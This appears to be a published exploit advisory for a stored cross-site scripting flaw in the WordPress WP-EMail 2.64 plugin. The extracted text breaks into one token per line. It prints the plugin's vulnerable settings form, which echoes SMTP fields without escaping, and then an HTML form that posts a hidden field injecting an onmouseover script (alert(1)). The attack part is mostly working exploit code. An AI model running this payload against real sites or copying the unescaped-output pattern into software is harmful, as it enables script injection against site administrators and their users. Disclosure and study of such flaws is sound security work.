######################
# Exploit Title : Wordpress WP-EMail 2.64 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/wp-email/
# Date : 2015-01-03
# Software Link : https://downloads.wordpress.org/plugin/wp-email.2.64.zip
# Tested on : Windows 7 / Mozilla Firefox
######################
######################
# Vulnerable code :
<
table
class
=
"form-table"
>
<
tr
>
<
th
width
=
"20%"
><?
php
_e('SMTP Username:', 'wp-email'); ?></
th
>
<
td
><
input
type
=
"text"
name
=
"email_smtp_name"
value="<?php echo
stripslashes($email_smtp['username']); ?>" size="30" dir="ltr" /></
td
>
</
tr
>
<
tr
>
<
th
width
=
"20%"
><?
php
_e('SMTP Password:', 'wp-email'); ?></
th
>
<
td
><
input
type
=
"password"
name
=
"email_smtp_password"
value="<?php echo
stripslashes($email_smtp['password']); ?>" size="30" dir="ltr" /></
td
>
</
tr
>
<
tr
>
<
th
width
=
"20%"
><?
php
_e('SMTP Server:', 'wp-email'); ?></
th
>
<
td
><
input
type
=
"text"
name
=
"email_smtp_server"
value="<?php echo
stripslashes($email_smtp['server']); ?>" size="30" dir="ltr" /><
br
/><?
php
_e('You may leave the above fields blank if you do not use a SMTP server.', 'wp-email'); ?></
td
>
</
tr
>
</
table
>
#####################
Exploit Code:
<
html
>
<
body
>
<
form
method
=
"post"
<
input
type
=
"hidden"
name
=
"email_smtp_name"
value='"
style
=
"a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;"
onmouseover
=
alert
(1); a="'/>
<
input
type
=
"submit"
name
=
"Submit"
class
=
"button"
value
=
"Save Changes"
/>
</
form
>
</
body
>
</
html
>